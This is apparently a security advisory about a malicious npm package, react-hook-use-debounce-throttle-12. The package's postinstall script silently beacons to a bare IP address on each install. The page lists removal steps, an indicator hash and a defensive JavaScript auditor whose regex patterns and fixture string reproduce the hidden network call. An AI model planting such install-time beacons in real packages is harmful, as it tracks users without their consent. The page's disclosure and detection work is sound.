Malicious package

react-hook-use-debounce-throttle-12 (npm)

Malicious code in react-hook-use-debounce-throttle-12 (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5909

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall react-hook-use-debounce-throttle-12

What this malware does

package.json declares a postinstall script that uses Node's https module to issue an HTTP GET to the bare IP 8.140.205.78:80 on every npm install. The request is wrapped in try/catch and an .on('error', ...) handler that swallows failures, so errors never reach the operator's install output and the beacon stays hidden. The package advertises itself as a React debounce/throttle hooks library, functionality that requires no install-time network I/O. The beacon discloses each installer's public IP address, install timestamp, and Node.js version (via the default User-Agent) to a host with no relationship to the stated purpose.

The package also has typosquat-shaped naming (a -12 numeric suffix on a generic React hook utility name) and placeholder author metadata (dev-utils <[email protected]>, and a GitHub path that does not correspond to a known publisher), consistent with victim-enumeration / install-tracking infrastructure.
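A defender-side check for the pattern described above, as an added example that is not part of the original advisory or the package's code: it flags install-time lifecycle scripts in a parsed package.json that reference a bare IPv4 address or load a Node networking module, and records whether errors are silently swallowed. The function name auditManifest, the files input shape and the sample manifest are assumptions made for this example; it also covers preinstall, install and prepare, beyond the postinstall hook the advisory names.

```javascript
// Added example: flag npm lifecycle scripts that touch the network at install time.
const LIFECYCLE = ["preinstall", "install", "postinstall", "prepare"];
// Dotted-quad IPv4 literal with an optional :port, e.g. 192.0.2.10:80.
const OCTET = "(?:25[0-5]|2[0-4]\\d|1?\\d?\\d)";
const BARE_IP = new RegExp(`\\b(?:${OCTET}\\.){3}${OCTET}\\b(?::\\d{1,5})?`, "g");
// require()/import of a Node core module that can open a socket.
const NET_MODULE = /(?:require\(\s*|from\s+)['"](?:node:)?(https?|net|dgram|tls)['"]/g;
// Empty 'error' listener or empty catch block: failures never reach the console.
const SWALLOWED =
  /\.on\(\s*['"]error['"]\s*,\s*(?:function\s*\(\w*\)|\(?\w*\)?\s*=>)\s*\{\s*\}|catch\s*(?:\(\w*\))?\s*\{\s*\}/;

// manifest: parsed package.json. files: { relativePath: sourceText } for the
// package's own files (hypothetical input shape chosen for this example).
function auditManifest(manifest, files = {}) {
  const findings = [];
  for (const hook of LIFECYCLE) {
    const cmd = (manifest.scripts || {})[hook];
    if (!cmd) continue;
    // Scan the command line plus every .js/.cjs/.mjs file it names.
    const sources = [cmd];
    for (const [, rel] of cmd.matchAll(/([\w.\/-]+\.(?:c|m)?js)\b/g)) {
      const src = files[rel.replace(/^\.\//, "")];
      if (src !== undefined) sources.push(src);
    }
    const text = sources.join("\n");
    const ips = [...new Set(text.match(BARE_IP) || [])]
      .filter((ip) => !/^(?:127\.|0\.0\.0\.0)/.test(ip)); // ignore loopback/unspecified
    const modules = [...new Set([...text.matchAll(NET_MODULE)].map((m) => m[1]))];
    if (ips.length || modules.length) {
      findings.push({ hook, ips, modules, errorsSwallowed: SWALLOWED.test(text) });
    }
  }
  return findings;
}

// Constructed fixture, not the real package's files; 192.0.2.10 is a documentation address.
const SAMPLE_MANIFEST = {
  name: "example-hooks-lib",
  version: "1.0.0",
  scripts: { postinstall: "node scripts/setup.js", test: "jest" },
};
const SAMPLE_FILES = {
  "scripts/setup.js":
    "try { require('https').get('http://192.0.2.10:80/').on('error', () => {}); } catch (e) {}",
};

console.log(JSON.stringify(auditManifest(SAMPLE_MANIFEST, SAMPLE_FILES), null, 2));
```

Running installs with npm's --ignore-scripts option keeps lifecycle scripts like this from executing at all.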

Malicious versions

1 flagged
1.0.0

Indicators of compromise (SHA-256)

f7491b25e457c908dae1b32fe800f461843e4463807c8590044e4b7cc769843a

Frequently asked questions

No. react-hook-use-debounce-throttle-12 on npm has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006801

Credits

  • Amazon Inspector · finder

react-hook-use-debounce-throttle-12 (npm) malicious package — MAL-2026-5909 | O3 Security